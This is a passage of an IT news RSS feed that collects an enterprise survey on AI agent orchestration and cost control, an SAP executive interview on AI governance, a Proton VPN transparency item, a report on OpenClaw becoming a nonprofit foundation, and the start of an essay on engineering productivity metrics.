In the April–May survey (n=145), only 34% expected a hybrid control plane, and a greater number (12%) expected to hand control fully to a provider-managed service. These two snapshots don’t yet measure a confirmed longitudinal trend — but the direction of the conversation is unambiguous: toward keeping control.</p><p>Lock-in is also a new arrival as a top concern. In the April–May wave, the leading concern was security and permissioning limitations (32%), with lock-in second at 24%; by June the two had traded places. The worry about provider platforms appears to be maturing from whether they can be secured to whether they can be replaced.</p><h2>Finding 7: The chatbot trap — most “agents” aren’t agents yet</h2><p><b>Enterprises admit most deployments are still chatbot wrappers</b></p><p>We asked enterprises to assess their portfolios honestly: what share of their deployed “agents” are true multi-step orchestrated workflows versus simple single-prompt chatbot wrappers. The answer is the defining finding of this wave.</p><div></div><p>This is the gap at the center of the report. Combining the bottom two bands, 71% of enterprises (72 of 101) say a quarter or fewer of their deployed “agents” are genuinely orchestrated — and just 10% (10 of 101) have crossed the halfway mark. The ambition documented in the earlier findings — model-provider platforms, reliability-first success metrics, production rollouts, a deliberate control architecture — runs well ahead of the deployed reality, which remains overwhelmingly single-prompt assistants dressed as agents. This is less a contradiction than a roadmap: the platforms, budgets, and strategies are being put in place precisely because the orchestrated portfolio is still so thin. The open question for later waves is how fast the reality closes on the ambition.</p><h2>Finding 8: Fiscal control is still reactive</h2><p><b>Only a minority can stop a runaway agent before the bill arrives</b></p><p>Finally, we asked how enterprises enforce fiscal control over agent token consumption — the risk that an autonomous loop exhausts a budget before anyone intervenes. Most rely on native caps or after-the-fact monitoring; real-time programmatic control is the exception.</p><div></div><p>More than a quarter of enterprises (27%) admit they have no real-time, programmatic way to stop an agent before a budget-breaking bill arrives — they learn of it from the logs afterward. Another 32% lean entirely on the native caps and throttles built into their primary platform, a control only as good as the provider’s tooling and one that ties back to the lock-in concern of Finding 6. The enterprises building custom gateways (23%) or exploiting cross-model routing to arbitrage cost (19%) are the ones treating token burn as an engineering problem to be controlled deterministically. As with orchestration maturity, fiscal control is an area where the operational reality lags the ambition: agents are moving toward production faster than the cost-control plane around them is being built.</p><p>It’s worth noting, a split appears according to company size: roughly one in three enterprises under 2,500 employees (34%) exercises only reactive control of agent spend, against 20% of larger enterprises — directional figures, but consistent with the chatbot-trap split. The mid-market is running the least mature agents on the least instrumented budgets.</p><h2>The bottom line: The layer is real; most of the agents aren't yet</h2><p>Organizations with 100 or more employees describe an orchestration strategy that is consolidating quickly and maturing slowly. They are standardizing on model-provider platforms — Anthropic’s Claude leads at 40% — chosen for the gravity of the underlying model, and they judge success by reliable multi-step execution. Investment is flowing to workflow tooling and permissions, the strategy is to consolidate frameworks and push agents into production, and the control plane they expect is deliberately hybrid, because vendor lock-in is the risk they fear most.</p><p>But the honest self-assessment punctures the ambition. Seventy-one percent say a quarter or fewer of their deployed “agents” are truly orchestrated, only 10% are past the halfway mark, and more than a quarter cannot stop a runaway agent in real time. The orchestration layer — the platforms, the budgets, the control architecture — is being built ahead of the orchestrated portfolio it is meant to run. At 101 respondents in a single June wave this reads as a clear directional signal rather than a precise measurement: enterprises have decided how they want to orchestrate agents well before most of their agents are doing anything an orchestration layer is for. The question for subsequent waves is whether the deployed reality closes the gap on the ambition — or whether the chatbot trap proves stickier than the roadmap assumes.</p><hr><p><i>Based on survey responses from 101 qualified enterprise respondents (100+ employees), drawn from a single June 2026 wave. Because this is one wave rather than a pooled multi-month sample, results read directionally rather than as a confirmed trend. Respondents include product and program managers, CIOs, CTOs and CISOs, consultants and advisors, and directors and VPs of data, AI, and engineering, across Technology/Software, Financial Services, Healthcare, and other sectors.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[3 Questions: Neural transparency and the future of AI design]]></title>
<description><![CDATA[Assistant Professor Pat Pataranutaporn describes a new interface that lets everyday users glimpse inside an AI's neural network before their chatbot ever says a word.]]></description>
<link>https://tsecurity.de/de/3671822/ai-nachrichten/3-questions-neural-transparency-and-the-future-of-ai-design/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671822/ai-nachrichten/3-questions-neural-transparency-and-the-future-of-ai-design/</guid>
<pubDate>Wed, 15 Jul 2026 22:33:45 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Assistant Professor Pat Pataranutaporn describes a new interface that lets everyday users glimpse inside an AI's neural network before their chatbot ever says a word.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI is paying off, but governance is lagging behind]]></title>
<description><![CDATA[Enterprises are facing two simultaneous challenges with AI: The risks associated with it are evolving faster than governance frameworks, while the business benefits are often difficult to measure.



This is one of the key findings of The Value of AI, a study commissioned by SAP from Oxford Econo...]]></description>
<link>https://tsecurity.de/de/3671333/it-nachrichten/ai-is-paying-off-but-governance-is-lagging-behind/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671333/it-nachrichten/ai-is-paying-off-but-governance-is-lagging-behind/</guid>
<pubDate>Wed, 15 Jul 2026 18:33:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Enterprises are facing two simultaneous challenges with AI: The risks associated with it are evolving faster than governance frameworks, while the business benefits are often difficult to measure.</p>



<p class="wp-block-paragraph">This is one of the key findings of <a href="https://www.sap.com/documents/2026/07/92b94d7d-5a7f-0010-bca6-c68f7e60039b.html" target="_blank" rel="noreferrer noopener">The Value of AI</a>, a study commissioned by SAP from Oxford Economics. Now in its second year, the study surveyed 2,600 executives from 13 countries worldwide.</p>



<h2 class="wp-block-heading">High expectations, limited preparation</h2>



<p class="wp-block-paragraph">On average, the enterprises surveyed plan to spend around $28 million on AI (up from $26.7 million last year), and expect a 21% ROI (from 16% last year). Expectations for AI agents are particularly high, with ROI expected to reach 17% this year, up from 10% last year. Furthermore, 83% of respondents worldwide said agentic AI has the potential to fundamentally transform their organization. On the other hand, only 3% of respondents said their enterprises were fully prepared for the deployment of AI agents.</p>



<p class="wp-block-paragraph">There are gaps, particularly when it comes to governance:</p>



<ul class="wp-block-list">
<li>Only 12% of respondents said their skills or processes were able to govern AI effectively,</li>



<li>38% do not have human-in-the-loop processes in place for oversight of AI agents, and</li>



<li>only 63% have established permissions and access controls for agents.</li>
</ul>



<p class="wp-block-paragraph">Other concerns include weaknesses in the organization of AI deployment, poor data quality, insufficient employee training, and the widespread use of shadow AI.</p>



<h2 class="wp-block-heading">Governance is the bigger challenge</h2>


<div class="extendedBlock-wrapper block-coreImage right"><figure class="wp-block-image alignright size-large is-resized"> width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption">Sean Kask, Chief AI Strategy Officer at SAP </figcaption></figure><p class="imageCredit">SAP</p></div>



<p class="wp-block-paragraph">In an interview, <a href="https://www.linkedin.com/in/seankask/" target="_blank" rel="noreferrer noopener">Sean Kask</a>, Chief AI Strategy Officer at SAP, commented on the study’s key findings.</p>



<p class="wp-block-paragraph"><em>Mr. Kask, in the study’s foreword, you write that companies are currently facing two challenges simultaneously: The risks associated with AI are evolving faster than governance, while the business benefits are often difficult to measure. Which of these poses the greater problem for companies?</em></p>



<p class="wp-block-paragraph"><strong>Sean Kask:</strong> Measuring the business value of IT investments has never been easy. The same applies to AI. That’s why I currently consider the governance issue to be the greater challenge. While traditional governance principles and best practices for secure software development remain important even in the age of large language models and agent-based AI, entirely new risks are emerging at the same time.</p>



<p class="wp-block-paragraph">For example, as soon as companies roll out AI on a broad scale, they suddenly discover hundreds or even thousands of so-called shadow agents that employees are using without central oversight. Or they find that a significant portion of the workforce is copying content into private ChatGPT accounts. Such risks often only become apparent once AI is already being used productively.</p>



<p class="wp-block-paragraph"><em>According to your study, German companies invest an average of nearly $40 million in AI, more than companies in all other countries surveyed. Why is that?</em></p>



<p class="wp-block-paragraph"><strong>Kask:</strong> I was less surprised by the amount of investment than by the fact that, overall, the level of investment and the return on investment achieved have developed very similarly across the various countries. There’s no clear answer as to why Germany invests more. In part, it’s likely simply because costs here are higher than in India, for example.</p>



<p class="wp-block-paragraph">However, we’re also seeing a high level of AI adoption among German companies. SAP has a dashboard that allows us to track how our customers are using AI features. Germany is among the countries with particularly high usage. Added to this are the strong industrial base and the political impetus from Europe, which are driving the use of AI. Accordingly, companies there are making targeted investments in building the necessary expertise.</p>



<p class="wp-block-paragraph"><em>According to the study, 47% of German companies are satisfied with the return on investment from their AI investments. At the same time, 77% say they are still far from realizing AI’s full potential. Isn’t that a contradiction?</em></p>



<p class="wp-block-paragraph"><strong>Kask:</strong> No, we see this pattern worldwide. Companies initially invest in a few AI use cases and realize: This works; we’re creating added value. Accordingly, they’re satisfied with their investment.</p>



<p class="wp-block-paragraph">But this is precisely what leads them to identify further use cases. They explore AI agents and want to utilize them as well. However, it is exactly at this point that many encounter new challenges in implementation and scaling.</p>



<p class="wp-block-paragraph">The study therefore primarily highlights a learning curve: The more experience companies gain with AI, the greater their awareness of its previously untapped potential becomes.</p>



<p class="wp-block-paragraph"><em>According to the study, only 33% of companies surveyed have KPIs at the executive board level that are directly linked to the implementation of AI. In your view, which metrics should supervisory boards and CEOs definitely be tracking?</em></p>



<p class="wp-block-paragraph"><strong>Kask:</strong> For us, a key indicator is employee enablement. How many employees have already successfully completed training or upskilling programs related to AI? Without the appropriate skills, AI adoption will fall short of its potential.</p>



<p class="wp-block-paragraph">Transparency is equally important. Companies should know which AI agents are actually in use within their landscape. SAP offers the SAP AI Agent Hub for this purpose, which automatically discovers and inventories agents from SAP and third-party environments. Customers have already been able to identify thousands of agents this way, which highlights the need for centralized governance and transparency.</p>



<p class="wp-block-paragraph">In addition, companies should have a complete overview of all AI use cases. A robust business case should be in place for each use case. We often see two extremes: Either the executive board is under pressure to implement AI as quickly as possible and allocates a lump-sum budget for this purpose. Or management initially takes a wait-and-see approach. This leads to independent pilot projects springing up throughout the company, with individual departments procuring their own tools and entering into their own contracts.</p>



<p class="wp-block-paragraph">At SAP, we therefore follow a clearly structured selection process. Each idea first undergoes an assessment of its expected business value. We then examine technical feasibility, data availability, and ethical and governance aspects. From management’s perspective, it is crucial to maintain transparency regarding all ongoing AI projects at all times and to consistently prioritize them based on their business value.</p>



<h2 class="wp-block-heading">Agents, too, need a ‘hire-to-retire’ lifecycle</h2>



<p class="wp-block-paragraph"><em>Even with the introduction of dozens or even hundreds of AI agents, governance becomes increasingly complex. What capabilities do enterprise platforms need to manage AI agents securely and in a controlled manner at scale?</em></p>



<p class="wp-block-paragraph"><strong>Kask:</strong> We make a conscious effort not to anthropomorphize AI too much. Nevertheless, the analogy is helpful: Agents require a complete hire-to-retire lifecycle. This begins with the detection and registration of an agent. It is then integrated into the enterprise environment, granted the necessary permissions, and given access to the data sources it needs to perform its tasks.</p>



<p class="wp-block-paragraph">Observability is just as important. Companies must be able to track what an agent is actually doing in the system at all times. In addition, they should track key performance indicators: Is the agent achieving the desired results? How efficiently is it working? How many tokens does it consume? How many processing steps does it require for a task?</p>



<p class="wp-block-paragraph">Ultimately, this involves several key components: a complete inventory of all agents, appropriate governance, risk, and compliance (GRC) mechanisms, transparency regarding agent behavior, and continuous monitoring. This is the only way to ensure that AI agents consistently operate within defined parameters and deliver the desired business value.</p>



<p class="wp-block-paragraph"><em>In your estimation, which business processes will companies actually delegate entirely to AI agents over the next two to three years?</em></p>



<p class="wp-block-paragraph"><strong>Kask:</strong> Currently, such agents work particularly well in clearly defined use cases. SAP will release more than 50 (currently 34) specialized AI agents.</p>



<p class="wp-block-paragraph">One example is periodic financial reporting. In this context, journal entries must be made based on numerous rules stored in documents, emails, or previous transactions. The agent analyzes these various sources of information, derives a recommendation from them, and suggests the appropriate journal entry to the user.</p>



<p class="wp-block-paragraph">Based on what we’ve heard from customer projects, employees at medium-sized companies currently spend about twelve hours per month on these tasks. With the help of an AI agent, this effort can be reduced to two to three hours.</p>



<p class="wp-block-paragraph">Another area of application is production planning. If delivery dates change or new orders come in at short notice, the entire production plan must be adjusted. It is precisely these kinds of complex optimization tasks that are ideally suited for AI agents.</p>



<p class="wp-block-paragraph">In principle, there are virtually no limits to the narrowly defined business processes in which agents can be deployed. However, they will not operate completely autonomously at first.</p>



<h2 class="wp-block-heading">Trust in AI begins with a stable foundation</h2>



<p class="wp-block-paragraph"><em>Many companies still struggle to trust AI agents. After all, large language models operate probabilistically and can produce false information. This is particularly problematic in financial processes. How do you build trust?</em></p>



<p class="wp-block-paragraph"><strong>Kask:</strong> Trust begins with a stable foundation. ERP systems remain the reliable system of record. They operate deterministically, contain the business logic, and hold the relevant company data. AI agents build upon this foundation. They do not replace it.</p>



<p class="wp-block-paragraph">Equally important is the human-in-the-loop principle. Employees must be able to understand what the agent is doing, verify its results, and intervene if necessary. That’s why employee training also plays a crucial role. They must understand how generative AI works and where its limitations lie.</p>



<p class="wp-block-paragraph">Of course, language models can hallucinate. At the same time, we must not forget that humans are not infallible either. The key lies in the collaboration between humans and AI. This allows us to improve both the efficiency and the quality of many business processes.</p>



<p class="wp-block-paragraph">Another important component is transparency. Our global AI ethics policy, for example, stipulates that users must always be able to recognize when AI is involved. In Joule, it’s possible to trace which data sources the agent used and which steps it went through in reaching its decision. This traceability is an essential prerequisite for trust.</p>



<p class="wp-block-paragraph"><em>What distinguishes an SAP agent from a general AI agent that merely accesses an ERP system?</em></p>



<p class="wp-block-paragraph"><strong>Kask:</strong> The key difference is that Joule and the SAP agents are directly embedded in the ERP system. There, for example, we’ve built a knowledge graph that describes the semantic relationships between all tables, business objects, and data fields.</p>



<p class="wp-block-paragraph">To put this into perspective: The SAP S/4HANA Knowledge Graph is based on approximately 452,000 ABAP tables, 7.3 million data fields, and thousands of analytical views. The semantic relationships between these artifacts are modeled in the Knowledge Graph and made available for AI applications.</p>



<p class="wp-block-paragraph">For example, if a user wants to view all open purchase orders, the agent does not first have to laboriously search for the relevant information. It immediately knows which tables and objects are relevant and also understands the relationships between a purchase order, a purchase requisition, the responsible approvers, and other business objects. As a result, the agent not only works much more precisely but also requires significantly fewer tokens because it can greatly narrow down the search space.</p>



<p class="wp-block-paragraph">If, instead, one attempts to simply overlay AI onto an existing system or extract data from a relational ERP system, many of these relationships are lost. In a sense, this destroys the semantic context that is crucial for precise answers.</p>



<p class="wp-block-paragraph">That is why we view the ERP system as an enormous strategic advantage. It has been the system of record for decades and contains roughly 50 years of codified business and process knowledge. This knowledge forms the foundation for what we call the <a href="https://www.cio.com/article/4170465/saps-biggest-ai-bet-yet-agents-that-execute-not-just-assist.html">autonomous enterprise</a>. The agents build upon this knowledge and continue to develop it.</p>



<p class="wp-block-paragraph">In the future, SAP agents will also communicate bidirectionally with agents from other providers via standards such as Agent-to-Agent (A2A).</p>



<p class="wp-block-paragraph"><em>According to your study, AI currently creates the greatest added value in decision-making, customer interaction, and gaining new insights, rather than in traditional productivity gains. Will this change the way companies justify AI investments in the future?</em></p>



<p class="wp-block-paragraph"><strong>Kask:</strong> In our study, productivity was simply rated slightly lower than, for example, gaining new insights. In the long term, however, productivity remains the ultimate goal. Europe, in particular, has been suffering from comparatively weak productivity growth for years.</p>



<p class="wp-block-paragraph">At SAP, we therefore first evaluate every new AI feature based on its specific business value. For all agents and AI features that we include in our AI Feature Catalog, we first conduct a value analysis. We ask: What benefit does the feature offer the user? Does it contribute to higher revenue? Does it increase productivity? Only then is it developed further.</p>



<p class="wp-block-paragraph">At the moment, the greatest added value often still lies in consolidating information from structured and unstructured data sources and making it accessible via natural language. The next step, however, is to translate these insights directly into more efficient business processes. That is precisely where the greatest productivity gains will be realized in the future.</p>



<blockquote class="wp-block-quote is-style-plain is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph"><em>If you could give CIOs just one or two pieces of advice for the transition from generative AI to AI agents, what would they be?</em></p>
</blockquote>



<p class="wp-block-paragraph"><strong>Kask:</strong> In my view, the biggest mistake would be to try to transform the entire company all at once or to attempt to perfectly prepare all the data right from the start.</p>



<p class="wp-block-paragraph">Instead, you should consider what kind of agent can create significant added value, and then implement it. Of course, this agent needs access to consistent and context-rich enterprise data. That’s exactly what we’re working on at SAP with technologies like the knowledge graph, which maps the semantic relationships within enterprise data.</p>



<p class="wp-block-paragraph">In addition, with data products and the SAP Business Data Cloud, we provide tools that make data from various sources usable for AI agents. Thanks to zero-copy and data fabric approaches, information from legacy systems, Snowflake, or ERP systems can be consolidated without first having to extensively replicate the data. For a procurement agent, this makes it possible to provide exactly the relevant data for the specific use case.</p>



<p class="wp-block-paragraph">The key point is this: Companies do not have to wait until they have fully migrated to the cloud or consolidated their entire data landscape. With the technologies available today, data can already be made usable for specific AI agents, managed in a controlled manner, and used to quickly generate initial business value. On the other hand, those who wait for the perfect starting point run the risk of falling behind.</p>



<p class="wp-block-paragraph"><em>This article is adapted from one first published by Computerwoche.</em></p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<p class="wp-block-paragraph"><a></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Proton says it rejected all 47 data requests targeting VPN users in 2026]]></title>
<description><![CDATA[Proton has updated its Proton VPN transparency report, revealing that it received 47 legally binding requests for user information during the first half of 2026. According to the company, all 47 requests were denied because Proton VPN's no-logs policy meant it had no data capable of identifying t...]]></description>
<link>https://tsecurity.de/de/3671208/it-security-nachrichten/proton-says-it-rejected-all-47-data-requests-targeting-vpn-users-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671208/it-security-nachrichten/proton-says-it-rejected-all-47-data-requests-targeting-vpn-users-in-2026/</guid>
<pubDate>Wed, 15 Jul 2026 17:38:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Proton has updated its Proton VPN transparency report, revealing that it received 47 legally binding requests for user information during the first half of 2026. According to the company, all 47 requests were denied because Proton VPN's no-logs policy meant it had no data capable of identifying the users sought by authorities. The updated transparency …</p>
<p>The post <a href="https://cyberinsider.com/proton-says-it-rejected-all-47-data-requests-targeting-vpn-users-in-2026/">Proton says it rejected all 47 data requests targeting VPN users in 2026</a> appeared first on <a href="https://cyberinsider.com/">CyberInsider</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw becomes a nonprofit foundation as it seeks to be ‘the Switzerland of AI’]]></title>
<description><![CDATA[OpenClaw’s announcement that it has become a nonprofit foundation is generating IT excitement because of the potential for governance and development consistency that the popular platform has thus far lacked. Still, some worry about the risks created by the move. 



“Our ambition is for OpenClaw...]]></description>
<link>https://tsecurity.de/de/3671162/ai-nachrichten/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671162/ai-nachrichten/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai/</guid>
<pubDate>Wed, 15 Jul 2026 17:19:35 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">OpenClaw’s announcement that it has become a nonprofit foundation is generating IT excitement because of the potential for governance and development consistency that <a href="https://www.computerworld.com/article/4128257/openclaw-the-ai-agent-thats-got-humans-taking-orders-from-bots.html" target="_blank">the popular platform </a>has thus far lacked. Still, some worry about the risks created by the move. </p>



<p class="wp-block-paragraph">“Our ambition is for OpenClaw to be the Switzerland of AI. Neutral ground where every model and every lab can plug into the technology and collaborate on standards in the era of agents,” <a href="https://openclaw.ai/blog/introducing-openclaw-foundation/" target="_blank" rel="noreferrer noopener">OpenClaw said in a post</a>. “That work is already underway in Foundation-convened councils on agent identity, agent profiles, evals, and enterprise deployment.”</p>



<p class="wp-block-paragraph">The statement, co-authored by OpenClaw creator <a href="https://www.linkedin.com/in/steipete/" target="_blank" rel="noreferrer noopener">Peter Steinberger</a>, pointed out, “the great open source projects of our time — Linux, Apache, Mozilla — endure because a neutral steward stands behind them. That is the role we are taking on to keep OpenClaw MIT licensed, open, and independent so that everyone building on it can trust it will be here for the long term.”</p>



<p class="wp-block-paragraph">But it reassured users that the original OpenClaw leadership is still in charge.</p>



<p class="wp-block-paragraph">“Peter built this thing and Peter keeps making the calls, especially the technical ones. Since joining OpenAI earlier this year, he has continued to steward OpenClaw as an open and independent project, and OpenAI has made a commitment to keep it that way,” the post said. “The foundation is here to serve: good governance, stable funding, and paying the people who keep the claws alive.”</p>



<p class="wp-block-paragraph">However, some analysts and consultants were skeptical about how much true independence Steinberger would have, given his salaried role with OpenAI. </p>



<h2 class="wp-block-heading">Neutrality claim in question</h2>



<p class="wp-block-paragraph">“The Switzerland of AI neutrality claim collapses under its own announcement,” said <a href="https://www.linkedin.com/in/noah-m-kenney-27499a166/" target="_blank" rel="noreferrer noopener">Noah Kenney</a>, principal consultant at Digital 520. “OpenAI runs a team [at OpenAI] called Claw Labs that Peter leads and OpenAI is a major donor to OpenClaw. The ‘neutral steward’s’ chief technical decision maker is employed by one of the competing labs it is supposed to be neutral with.” To OpenAI, he said, OpenClaw is closer to a tax-exempt nonprofit subsidiary than it is to a neutral ‘Switzerland of AI.’</p>



<p class="wp-block-paragraph">He pointed out that, in addition, Microsoft is shipping <a href="https://www.computerworld.com/article/4173442/enterpriseclaw-wants-to-bring-governance-to-the-openclaw-era-2.html" target="_blank">the enterprise version</a> of OpenClaw, and Nvidia is shipping the hardware bundle. “This is being called the Switzerland of AI, but Switzerland does not have its central bank run by France,” he observed.</p>



<p class="wp-block-paragraph">Kenney said that what the new OpenClaw has actually built is “a shared dependency that several competitors fund, staff, and steer, wrapped in a nonprofit structure. Enterprise IT should understand that structure, because treating OpenClaw as neutral is a mistake,” adding that CIOs need to look at this development devoid of the emotional component. </p>



<p class="wp-block-paragraph">“There is a strategic irony here that CIOs should sit with,” Kenney said. “If OpenClaw succeeds at becoming the universal agent substrate, then every model plugs into the same identity layer, the same profiles, and the same deployment plumbing. The thing every vendor is racing to own becomes a commodity that nobody owns.” He pointed out that, in the short term, that is genuinely good news for buyers because it means less lock-in and more portability.</p>



<p class="wp-block-paragraph">“But,” he said, “when the connective tissue is free and natural, the only labs that benefit are the ones with the best models and the deepest distribution. Commoditize the layer below you and you compete on the layer where you are already strongest. The foundation is not a charity. It is the biggest players agreeing to stop fighting over the plumbing so they can fight over the water, and the enterprise is the one paying the water bill either way.”</p>



<h2 class="wp-block-heading">Good news, bad news</h2>



<p class="wp-block-paragraph"><a href="https://moorinsightsstrategy.com/team/jason-andersen/" target="_blank" rel="noreferrer noopener">Jason Andersen</a>, principal analyst at Moor Insights &amp; Strategy, liked the potential consistency that could emerge from the structural change, given the complexity of agent development today. </p>



<p class="wp-block-paragraph">“We are seeing a lot of OpenClaw variants hit the market, such as those from Nvidia as well as competing products from cloud and SaaS vendors. A common base helps solidify the common parts,” Andersen noted. “That said, a common challenge is the sustainability of these open source foundations over time. In addition to releasing code, these foundations need funding to evolve and grow. And that funding needs to come from continued momentum to incentivize existing members to increase investment and recruit new members to join.”</p>



<p class="wp-block-paragraph">Andersen stressed that IT buyers need to keep an eye on the roadmap for any OpenClaw variant they choose to deploy, “as that will directly impact the foundation, and the momentum of the foundation and common base. If the common base loses momentum, it can lead to forks, or just a loss of innovation. When that happens, members tend to back away, which puts customers in limbo.”</p>



<p class="wp-block-paragraph">But not everyone sees the promised structure as entirely good for IT.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/ishraqkhann/" target="_blank" rel="noreferrer noopener">Ishraq Khan</a>, CEO at coding productivity tool vendor Kodezi, said, “most CIOs do not want to bet their future entirely on a single model vendor. They want Claude for some workloads, GPT for others, open models for sensitive environments, and potentially internally fine-tuned systems for specific use cases. The problem is that every vendor currently brings its own identity system, tool interfaces, permissions model, and operational assumptions. That fragmentation does not scale.”</p>



<p class="wp-block-paragraph">He said, “the risk if standards fail is straightforward: every vendor builds its own closed ecosystem, enterprises become locked into individual stacks, and security becomes dramatically harder. The opportunity if OpenClaw succeeds is equally significant: enterprises get portable agents, common identity standards, interoperable tooling, and a healthier competitive market around models rather than ecosystems.”</p>



<h2 class="wp-block-heading">Will it remain a nonprofit?</h2>



<p class="wp-block-paragraph">However, said <a href="https://acceligence.com/talent/profiles/justin-greis/" target="_blank" rel="noreferrer noopener">Justin Greis</a>, CEO of consulting firm Acceligence, one of the key details that IT executives will want to keep in mind is that OpenAI also began as a nonprofit, but it was quickly <a href="https://www.computerworld.com/article/4056490/openai-microsoft-discuss-shape-of-future-relationship.html" target="_blank">seen as not adhering to nonprofit objectives</a>. </p>



<p class="wp-block-paragraph">“OpenAI’s transition from a nonprofit research organization into a more complex structure highlighted the challenge of maintaining mission alignment while scaling technology, capital, partnerships, and commercial operations,” Greis said. “OpenClaw has the opportunity to address some of those governance questions earlier by establishing clear principles around neutrality, transparency, and decision-making before the ecosystem becomes even larger and more valuable.”</p>



<p class="wp-block-paragraph">He noted, “we have seen this pattern before with technologies like Linux and Kubernetes. The strongest open ecosystems succeeded because they created trusted foundations that enterprises could build upon. The technology was important, but the governance model that underpinned it was equally critical.”</p>



<h2 class="wp-block-heading">Risks are ‘squarely in IT’s lap’</h2>



<p class="wp-block-paragraph">Consultant <a href="https://formergov.com/directory/brianlevine" target="_blank" rel="noreferrer noopener">Brian Levine</a>, executive director of FormerGov, echoed Greis’ concerns. </p>



<p class="wp-block-paragraph">“CIOs shouldn’t assume that this nonprofit will always be a nonprofit, or confuse being a nonprofit with actually being neutral or unbiased,” he said. “The risks are squarely in IT’s lap: autonomous agents ‘with their own identity’ acting on a user’s behalf blow straight through traditional IAM assumptions. Issues, such as agent identity, auditability, secret handling. Identity boundaries have not yet been reliably solved. Until they are, enterprises should treat OpenClaw agents like privileged service accounts, not like a browser plugin.”</p>



<p class="wp-block-paragraph">Independent cybersecurity and risk advisor <a href="https://www.linkedin.com/in/steveneric/" target="_blank" rel="noreferrer noopener">Steven Eric Fisher</a> pointed to another IT exposure that might come from this OpenClaw transition: Cost.</p>



<p class="wp-block-paragraph">“OpenClaw currently has a very high token burn rate in usage, which presents a significant cost consideration for large-scale enterprise adoption,” he said. “The skills marketplace introduces <a href="https://www.csoonline.com/article/4129867/what-cisos-need-to-know-about-clawdbot-i-mean-moltbot-i-mean-openclaw.html" target="_blank">a new supply chain threat </a>that enterprises will need to manage. Threat management, and specifically handling <a href="https://www.csoonline.com/article/4135449/compromised-npm-package-silently-installs-openclaw-on-developer-machines.html" target="_blank">external marketplace elements</a>, can be highly challenging for open-source operations. Ultimately, at scale, enterprise adoption could become a difficult balancing act between managing high operational costs and securing an expanded security surface.”</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.computerworld.com/article/4196365/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai.html" target="_blank">Computerworld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[From story points to tokenmaxxing: Why engineering keeps measuring the wrong things]]></title>
<description><![CDATA[For decades, software engineering has been plagued by “productivity theater.” Every few years, the industry aligns around a new vanity metric — usually one that latches onto whatever technology happens to be in vogue at the time. For a discipline rooted in creativity and problem-solving, this is ...]]></description>
<link>https://tsecurity.de/de/3671158/ai-nachrichten/from-story-points-to-tokenmaxxing-why-engineering-keeps-measuring-the-wrong-things/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671158/ai-nachrichten/from-story-points-to-tokenmaxxing-why-engineering-keeps-measuring-the-wrong-things/</guid>
<pubDate>Wed, 15 Jul 2026 17:19:30 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For decades, software engineering has been plagued by “productivity theater.” Every few years, the industry aligns around a new vanity metric — usually one that latches onto whatever technology happens to be in vogue at the time. For a discipline rooted in creativity and problem-solving, this is a poor way to demonstrate progress. Yet, we find ourselves in this position once again. The pattern is often the same: reach for something we can easily count, and in doing so, lose sight of what we are actually trying to achieve.</p>



<h2 class="wp-block-heading">Quantity over quality: the wrong measurement, every time</h2>



<p class="wp-block-paragraph">I recall when I was coming up as a software engineer in the 1990s, a small number of companies took up the practice of paying their engineers by each line of code. This may have been productivity theater at its worst, leading to negative incentives, inefficient processes, and just generally bad engineering. Developers were rewarded for writing far more code than the problems they were facing required — classic “quantity over quality” — and the result was bloated, brittle codebases that were all but impossible to maintain. The goal — to create reliable software that solved real user problems — got buried under the incentive to produce.</p>



<p class="wp-block-paragraph">Then in the 2000s, <a href="https://www.atlassian.com/agile/project-management/estimation" data-type="link" data-id="https://www.atlassian.com/agile/project-management/estimation">the rise of Agile brought us story points</a>, an abstract way to estimate task complexity, effort, and risk relative to other work. Rather than answering “How long will this take?,” story points were meant to answer, “How big is this compared to what we’ve done before?” This approach sounds good in theory, but in practice, some development teams learned to game the system by inflating estimates, over-engineering solutions to look productive, and losing sight of whether the work they produced actually created value. Once again, the metric became the goal, and the actual goal — delivering outcomes that mattered to the business — became secondary.</p>



<p class="wp-block-paragraph">Every one of these metrics failed for the same reason: they measured effort instead of value.</p>



